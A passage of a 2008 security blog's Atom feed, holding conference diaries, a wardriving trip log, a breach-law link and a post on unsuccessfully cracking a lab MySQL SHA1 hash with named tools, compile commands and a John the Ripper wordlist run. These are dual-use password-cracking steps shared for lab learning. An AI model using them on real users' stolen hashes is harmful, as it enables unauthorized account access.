type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=8186755451384050205&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8186755451384050205'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/8186755451384050205'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/your-client-side-security-sucks-really.html' title='Your Client Side Security Sucks [really, it does]'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-1403556586088168546</id><published>2008-02-26T02:14:00.000-08:00</published><updated>2008-02-26T02:22:50.696-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='US'/><category scheme='http://www.blogger.com/atom/ns#' term='legislation'/><category scheme='http://www.blogger.com/atom/ns#' term='breach notification'/><title type='text'>Data Breach Notification Laws, State By State</title><content type='html'>&lt;span style="font-family: verdana;"&gt;I have long been an avid follower of breach notification legislation but usually in reagards to the west coast of the USA.  While reading my RSS feeds yesterday I came across &lt;a href="http://www.csoonline.com/read/020108/ammap/ammap.html"&gt;an interesting resource&lt;/a&gt;.  The link will take you to a map of the US that shows the breach notification status of each state in the Union via color coding and a nifty popup.  Far too useful and interesting to keep to myself.&lt;br /&gt;&lt;br /&gt;Enjoy!&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-1403556586088168546?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/1403556586088168546/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=1403556586088168546&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1403556586088168546'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/1403556586088168546'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/data-breach-notification-laws-state-by.html' title='Data Breach Notification Laws, State By State'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-7643442785756647555</id><published>2008-02-24T16:07:00.000-08:00</published><updated>2008-12-11T01:34:27.355-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cain'/><category scheme='http://www.blogger.com/atom/ns#' term='Abel'/><category scheme='http://www.blogger.com/atom/ns#' term='poc'/><category scheme='http://www.blogger.com/atom/ns#' term='unhash'/><category scheme='http://www.blogger.com/atom/ns#' term='SHA1'/><category scheme='http://www.blogger.com/atom/ns#' term='mysqlfast'/><category scheme='http://www.blogger.com/atom/ns#' term='mysql'/><category scheme='http://www.blogger.com/atom/ns#' term='john the ripper'/><title type='text'>MySQL, SHA1 and me</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VlJlZeZ-I/AAAAAAAAACE/Qrxk_5XkJ_0/s1600-h/MySQL_logo.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VlJlZeZ-I/AAAAAAAAACE/Qrxk_5XkJ_0/s200/MySQL_logo.png" alt="" id="BLOGGER_PHOTO_ID_5171650962437072866" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;While hacking around with SQL injection on the LSO (LearnSecurityOnline) labs, the subject of being able to crack a  MySQL SHA1 password hash came up and became a topic of interest and a challenge of sorts.  I have never come across this one before so I impulsively decided to pick it up and see what I could do with it before I had to get on a plane back to Seattle.&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;./poc&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;A quick Google search turned up this tool.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;A proof of concept (hence the name) MySQL password hash cracker.  Optimized for quad core CPU implementations&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Can be downloaded  from &lt;/span&gt;&lt;span style="color: rgb(0, 0, 128);font-size:100%;" &gt;&lt;u&gt;&lt;a href="http://www.sqlhack.com/poc.c"&gt;&lt;span style="font-family:Verdana,sans-serif;"&gt;http://www.sqlhack.com/poc.c&lt;/span&gt;&lt;/a&gt;&lt;/u&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;code&gt;&lt;span style="font-family:Verdana,sans-serif;"&gt;gcc -O3 -o poc poc.c&lt;/span&gt;&lt;/code&gt;&lt;/span&gt;&lt;span style="color: rgb(0, 0, 128);font-size:100%;" &gt;&lt;u&gt;&lt;span style="font-family:Verdana,sans-serif;"&gt; &lt;/span&gt;&lt;/u&gt;&lt;/span&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;I ran this for about 12 hours until it determined that the password was beyond 8 character and therefore out of scope for this particular program.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Performed on a Dell D600 Pentium M 1.4 Ghz Machine with 1 GB of RAM&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;./mysqlfast&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Some initial Googling turned up this tool.  I was able to run this one the longest albeit without any success.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;a href="http://packetstorm.linuxsecurity.com/Crackers/msqlfast.c"&gt;&lt;span style="font-family:Verdana,sans-serif;"&gt;http://packetstorm.linuxsecurity.com/Crackers/msqlfast.c&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;  &lt;pre style="margin-bottom: 0.2in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;gcc -O2 -fomit-frame-pointer mysqlfast.c -o mysqlfast&lt;/span&gt;&lt;/pre&gt;&lt;p style="margin-bottom: 0in;"&gt; &lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;I ran this tool for about 15 hours without success.  It was checking 9 character passwords when I ended execution of the program.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Performed on a Dell D600 Pentium M 1.4 Ghz Machine with 1 GB of RAM&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;./unhash&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;I came across this one looking for MySQL SHA1 crackers on PacketStorm Security.  I was only able to run it for a few hours before I had to pack up my laptops in preparation to catch my flight.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;http://packetstorm.codar.com.br/Crackers/unhash-0.9.tgz&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Performed on a Dell D600 Pentium M 1.4 Ghz Machine with 1 GB of RAM&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Cain &amp;amp; Abel&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Identified the hash as MySQL v3.23.  I attempted to use the built in dictionary running as many permutations as possible without any success.  It took about an hour or so to make it through the dictionary file.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Performed on a HP nc6000 Pentium M 1.6 Ghz laptop with 2 GB of RAM&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;John the Ripper (Joe McCray performed this test)&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;John is not natively capable of cracking MySQL SHA1 hashes and requires a patch to do so.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;[j0e@LinuxLaptop john-1.7.2]$ wget&lt;br /&gt;&lt;a href="http://openwall.com/john/contrib/john-1.7-all-4.diff.gz" target="_blank"&gt;http://openwall.com/john/contrib/john-1.7-all-4.diff.gz&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;[j0e@LinuxLaptop john-1.7.2]$ gunzip -c john-1.7-all-4.diff.gz | patch&lt;br /&gt;-p0&lt;br /&gt;&lt;br /&gt;[j0e@LinuxLaptop john-1.7.2]$ cd src/&lt;br /&gt;&lt;br /&gt;[j0e@LinuxLaptop src]$ su&lt;br /&gt;Password:&lt;br /&gt;&lt;br /&gt;[root@LinuxLaptop src]# make linux-x86-any &lt;/span&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;John was fed a 7 million entry password dictionary&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;[j0e@LinuxLaptop run]$ ./john&lt;br /&gt;--wordlist=../../../wordlistz/MassiveDictionary.txt mysql_hash.txt&lt;br /&gt;Loaded 1 password hash (Raw SHA1 [raw-sha1])&lt;br /&gt;guesses: 0  time: 0:00:00:03 100%  c/s: 862538  trying: zwolle &lt;/span&gt; &lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;This was NOT the correct password.&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;Performed on a Dell D620 Core Duo 2 1.83 laptop with 2GB of RAM&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;If anyone out there has any suggestions on more efficient ways to go about this I would LOVE to hear about them.&lt;/span&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style="font-family:verdana;"&gt;UPDATE: Sandro Gauci of &lt;a href="http://sipvicious.org/"&gt;SipVicious.org&lt;/a&gt; pointed me to a &lt;a href="http://www.matasano.com/log/958/enough-with-the-rainbow-tables-what-you-need-to-know-about-secure-password-schemes/"&gt;great resource&lt;/a&gt;.  Any other feedback and suggestions are welcome!&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="margin-bottom: 0in;"&gt;&lt;span style=";font-family:Verdana,sans-serif;font-size:100%;"  &gt;May Your Skill Prevail.&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-7643442785756647555?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/7643442785756647555/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=7643442785756647555&amp;isPopup=true' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7643442785756647555'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7643442785756647555'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/mysql-sha1-and-me.html' title='MySQL, SHA1 and me'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VlJlZeZ-I/AAAAAAAAACE/Qrxk_5XkJ_0/s72-c/MySQL_logo.png' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-4307606188860563195</id><published>2008-02-19T03:50:00.000-08:00</published><updated>2008-12-11T01:34:27.531-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DC'/><category scheme='http://www.blogger.com/atom/ns#' term='Burger King'/><category scheme='http://www.blogger.com/atom/ns#' term='Starbucks'/><category scheme='http://www.blogger.com/atom/ns#' term='wardriving'/><category scheme='http://www.blogger.com/atom/ns#' term='Maryland'/><category scheme='http://www.blogger.com/atom/ns#' term='Blackhat DC 2008'/><title type='text'>The DC/Maryland Saga Continues</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Z4u4MkgQQuE/R8VmH1ZeaAI/AAAAAAAAACU/oVMZ-yG6saI/s1600-h/100px-Seal-DC.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_Z4u4MkgQQuE/R8VmH1ZeaAI/AAAAAAAAACU/oVMZ-yG6saI/s200/100px-Seal-DC.png" alt="" id="BLOGGER_PHOTO_ID_5171652031883929602" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style=";font-family:verdana;font-size:100%;"  &gt;Today we actually made it back in by 2AM after eating dinner at Applebee's while watching the NBA All Star Game and then doing some wardriving of Aberdeen, Maryland (~800 Aps). Joe, evil1, Law and myself all stayed up most of the night hacking away and talking.&lt;/span&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:verdana;font-size:100%;"  &gt;Around noon we all had to drag ourselves out of bed to get evil1 to the airport to catch a 4:30pm flight. After dropping him off Lawrence and I had to stop at Starbuck's coffee (Burger King coffee is like kryptonite to Seattle denizens) and note that it appears that we had brought the overcast cloudy and rainy weather with us. &lt;/span&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:verdana;font-size:100%;"  &gt;Since we were already in the area and had our wardriving gear with us we decided that some good 'ol AP detection was in order. We were able to get a pretty good haul of ~10,000 AP's after about 3 hours then headed north for the long journey home.&lt;/span&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:verdana;font-size:100%;"  &gt;Tomorrow we are planning to drive back down to DC and do the BH DC 2008 Briefings early registration. If all goes well we may drive up to Philadelphia and do some wardriving before it gets too late.&lt;/span&gt;&lt;span style=";font-family:verdana;font-size:100%;"  &gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-4307606188860563195?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/4307606188860563195/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=4307606188860563195&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/4307606188860563195'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/4307606188860563195'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/dcmaryland-saga-continues.html' title='The DC/Maryland Saga Continues'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_Z4u4MkgQQuE/R8VmH1ZeaAI/AAAAAAAAACU/oVMZ-yG6saI/s72-c/100px-Seal-DC.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-6822842777439842580</id><published>2008-02-17T08:42:00.000-08:00</published><updated>2008-12-11T01:34:27.824-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Josh Wright'/><category scheme='http://www.blogger.com/atom/ns#' term='Shmoocon'/><category scheme='http://www.blogger.com/atom/ns#' term='PEAP'/><category scheme='http://www.blogger.com/atom/ns#' term='blackhat'/><category scheme='http://www.blogger.com/atom/ns#' term='defcon'/><category scheme='http://www.blogger.com/atom/ns#' term='Brad Antoniewicz'/><title type='text'>Shmoocon Day Three</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VijlZeZ9I/AAAAAAAAAB8/Ol-rgia107g/s1600-h/shmoocon_logo.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VijlZeZ9I/AAAAAAAAAB8/Ol-rgia107g/s200/shmoocon_logo.png" alt="" id="BLOGGER_PHOTO_ID_5171648110578788306" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;After 3 nights of 2-3 hours of sleep and a 1 ½ hour commute both ways everyone was exhausted today.  We made the decision to stay at the house and catch up on our rest before we got to a BBQ at Wolf's house.   I regret missing the PEAP: Pwned Extensible Authentication Protocol by Josh Wright and Brad Antoniewicz presentation.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;As I type this Joe and Lawrence are sitting at the dining room table with laptops with evil1 still in his room sleeping.  Overall shmoocon was a blast, the talks were o.k. but the people and side channel conversations we had were excellent.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Will I be going next year?  Absolutely! &lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Shouts out to to CG, Kev, Marco and Steve A.  I'll catch those who are going to BH Federal at the briefings next week or at DefCon later in the year.  If not see you guys on SILC.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-6822842777439842580?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/6822842777439842580/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=6822842777439842580&amp;isPopup=true' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6822842777439842580'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6822842777439842580'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/shmoocon-day-three.html' title='Shmoocon Day Three'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8VijlZeZ9I/AAAAAAAAAB8/Ol-rgia107g/s72-c/shmoocon_logo.png' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-6749071049097618834</id><published>2008-02-16T23:40:00.000-08:00</published><updated>2008-12-11T01:34:27.925-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SPIKE'/><category scheme='http://www.blogger.com/atom/ns#' term='Shmoocon'/><category scheme='http://www.blogger.com/atom/ns#' term='802.11'/><category scheme='http://www.blogger.com/atom/ns#' term='citrix'/><category scheme='http://www.blogger.com/atom/ns#' term='fuzzing'/><title type='text'>Shmoocon Day Two</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8ViNlZeZ8I/AAAAAAAAAB0/A9iAvRtTEvQ/s1600-h/shmoocon_logo.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8ViNlZeZ8I/AAAAAAAAAB0/A9iAvRtTEvQ/s200/shmoocon_logo.png" alt="" id="BLOGGER_PHOTO_ID_5171647732621666242" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;We were able to actually make it in on time today after getting 2 hours of sleep!  Watched the Active 802.11 Fingerprinting: Gibberish and "Secret Handshakes" to Know Your AP by Sergey Bratus, Cory Cornelius and Daniel Peebles.  I found this to be an interesting talk and hope that this research begins to delve into the client realm in the near future.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;I also had the pleasure of catching the following talks:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Got Citrix? Hack It! By Shanit Gupta and Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to "SPIKE Land" by Enno Rey and Daniel Mende.  There was also an impromptu talk by muts covering AV circumvention using ollydebug and Windows Vista ASLR circumvention.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;I had lunch with Kevin Figueora of K&amp;amp;T International Consulting, Marco Figueroa of MAF Consulting, Inc, Joe McCray of LearnSecurityOnline, Lawrence White of IGS and evil1 at the Chipotle down the street from the hotel.  All of us also got together later in the evening and had the most amazing time eating dinner, watching the All-Star 3 point shooting and Slam Dunk contest and having drinks and talking shop.  The talks at any convention are good to go to but these are the experiences that stay with you for a lifetime.&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-6749071049097618834?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/6749071049097618834/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=6749071049097618834&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6749071049097618834'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/6749071049097618834'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/shmoocon-day-two.html' title='Shmoocon Day Two'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Z4u4MkgQQuE/R8ViNlZeZ8I/AAAAAAAAAB0/A9iAvRtTEvQ/s72-c/shmoocon_logo.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6339171303043697983.post-7808973892486633778</id><published>2008-02-16T04:44:00.001-08:00</published><updated>2008-12-11T01:34:28.143-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Shmoocon'/><category scheme='http://www.blogger.com/atom/ns#' term='Rick Farina'/><category scheme='http://www.blogger.com/atom/ns#' term='AirTight'/><category scheme='http://www.blogger.com/atom/ns#' term='Offensive Security'/><category scheme='http://www.blogger.com/atom/ns#' term='Midnight Research Labs'/><category scheme='http://www.blogger.com/atom/ns#' term='LearnSecurityOnline'/><category scheme='http://www.blogger.com/atom/ns#' term='backtrack'/><title type='text'>Shmoocon Day One</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_Z4u4MkgQQuE/R8Vh51ZeZ7I/AAAAAAAAABs/cX9LB3fv9CY/s1600-h/shmoocon_logo.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_Z4u4MkgQQuE/R8Vh51ZeZ7I/AAAAAAAAABs/cX9LB3fv9CY/s200/shmoocon_logo.png" alt="" id="BLOGGER_PHOTO_ID_5171647393319249842" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-family: verdana;"&gt;Overslept like a bunch of jet lagged bums!  Arrived 2 hours late and missed all of the talks getting social with my peers.  Met some cool guys: muts from Offensive Security/Back|Track, Aaron Petersen from MRL (Midnight Research Labs) and Rick Farina from AirTight.  As is usual for my con experiences hung out with the LSO (LearnSecurityOnline) j0e and Chris and evil1 (mad props for webapp kung fu).&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6339171303043697983-7808973892486633778?l=blog.ironguard.net' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.ironguard.net/feeds/7808973892486633778/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6339171303043697983&amp;postID=7808973892486633778&amp;isPopup=true' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7808973892486633778'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6339171303043697983/posts/default/7808973892486633778'/><link rel='alternate' type='text/html' href='http://blog.ironguard.net/2008/02/shmoocon-day-one.html' title='Shmoocon Day One'/><author><name>Anthony Williams</name><uri>http://www.blogger.com/profile/02720356501218887018</uri><email>noreply@blogger.com</email><gd:image 